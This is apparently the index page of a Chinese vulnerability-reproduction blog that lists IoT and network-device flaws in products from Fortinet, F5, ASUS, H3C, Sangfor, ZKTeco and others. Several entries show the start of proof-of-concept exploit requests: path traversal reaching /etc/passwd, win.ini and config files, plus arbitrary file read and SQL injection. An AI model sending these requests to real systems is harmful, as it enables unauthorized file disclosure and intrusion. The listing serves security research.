通用之IOT系统类

通用之IOT系统类

  • brief introduction
  • Table of contents
  • Latest documents

    ND001 h3c-miniware-web-disclosure

    漏洞复现 ``` GET /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg HTTP/1.1 Host: rlsbcs.xxx.cn:1234 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Encoding: gz………

    myh0st - Sept. 16, 2025, 8 p.m.

    ND001 CVE-2018-13379

    Fortinet FortiOS路径遍历漏洞(CNNVD-201905-1026、CVE-2018-13379) 漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。Fortinet FortiOS 5.6.3 版本至 5.6.7 版本、6.0.0 版本至 6.0.4 版本中的 SSL VPN 受此漏洞影响。 可访问链接查看是否存在漏洞 /re………

    myh0st - Sept. 10, 2025, 6:12 p.m.

    ND003 DCN-Router-online_list-fileread

    神州数码DCN系统接口online_list.php存在任意文件读取漏洞 poc ```javascript POST /function/auth/user/online_list.php HTTP/1.1 Host: oa.xazlsec.com:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko………

    myh0st - Sept. 10, 2025, 3:02 p.m.

    ND001 clodop-printer-lfi

    漏洞复现 ``` GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1 Host: oa.xazlsec.com:9500 User-Agent: Mozilla/5.0 Connection: close Referer: https://127………

    myh0st - Sept. 10, 2025, 11:24 a.m.

    ND001 ASUS-router-error_page-lfi

    敏感信息泄漏漏洞 漏洞复现: ``` GET /error_page.htm?current_lang=/////etc/passwd HTTP/1.1 Host: rap.xazlsec.net.cn:881 User-Agent: Mozilla/5.0 Connection: close Referer: https://127.0.0.1/Main_Login.asp Accept-En………

    myh0st - Sept. 9, 2025, 5:12 p.m.

    ND003 e-zkeco-iclock-ic1ock-sqlinject

    漏洞复现 ``` POST /iclock/ic1ock HTTP/1.1 Host: www.xazlsec.cn:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Content-Length: 66 Connection: close Conte………

    myh0st - Aug. 26, 2025, 11:11 a.m.

    ND999 F5 Tmsh命令执行

    在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 影响范围 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.………

    myh0st - Aug. 21, 2025, 3:01 p.m.

    ND999 后渗透利用方式

    ⽹上很多上传shell就完事了,昨晚上跟朋友正好遇到了,连夜看了下代码补充下后渗透利⽤⽅法。

    myh0st - Aug. 14, 2025, 9:03 a.m.

    ND002 sangfor-ngaf-login-rce

    最近,深信服下⼀代防⽕墙曝光了远程代码执⾏漏洞。此漏洞通过绕过身份认证和注⼊ cookie 的⽅式来执⾏系统命令,公开的利⽤⽅式受到诸多限制且命令执⾏⽆回显,并且当⽬标机器不出⽹时,该漏洞利⽤⽅式便⽆法发挥作⽤,因此⽆法满⾜实际攻防场景的需求。

    myh0st - Aug. 13, 2025, 11:35 a.m.

    ND005 APISIX-CVE-2022-29266

    index.html 文件敏感信息泄露漏洞(CVE-2022-29266)

    myh0st - Aug. 12, 2025, 6:53 p.m.

    myh0st